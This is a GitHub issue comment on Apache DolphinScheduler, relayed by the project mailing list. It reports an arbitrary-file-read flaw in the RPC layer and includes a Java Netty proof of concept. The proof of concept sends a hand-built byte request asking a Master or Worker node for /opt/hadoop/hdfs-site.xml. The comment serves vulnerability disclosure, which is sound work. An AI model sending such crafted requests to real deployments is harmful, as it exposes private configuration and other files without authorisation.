xxjingcd commented on issue #13460:
URL:
https://github.com/apache/dolphinscheduler/issues/13460#issuecomment-1410270368
```java
public static void main(String[] args) throws InterruptedException {
EventLoopGroup group = new NioEventLoopGroup();
Bootstrap b = new Bootstrap();
b.group(group)
.channel(NioSocketChannel.class)
.handler(new ChannelInitializer<SocketChannel>() {
@Override
public void initChannel(SocketChannel ch) throws
Exception {
ChannelPipeline p = ch.pipeline();
p.addLast(new NettyDecoder(), new
EchoMsgHandler());
}
});
// Start the client.
ChannelFuture f = b.connect("127.0.0.1", 1234).sync();
Channel channel = f.channel();
// access /opt/hadoop/hdfs-site.xml
byte[] bytes = {-66, 0, 6, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 12, 123,
34, 105, 116, 101, 109, 115, 34, 58, 123, 125, 125, 0, 0, 0, 36, 123, 34, 112,
97, 116, 104, 34, 58, 34, 47, 111, 112, 116, 47, 104, 97, 100, 111, 111, 112,
47, 104, 100, 102, 115, 45, 115, 105, 116, 101, 46, 120, 109, 108, 34, 125};
ByteBuf mockAttackRequest = Unpooled.wrappedBuffer(bytes);
channel.writeAndFlush(mockAttackRequest);
}
```
>The `bytes` array is the command to view `/opt/hadoop/hdfs-site.xml`
file. And the `bytes` array can easily be constructed by a few codes;
Through the above code, you will get `/opt/hadoop/hdfs-site.xml` file which
is not a log file from the `Master` or `Worker`; That means a hacker can access
any file at any position;
"DS interval" can be easily broken on network communications ;
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]
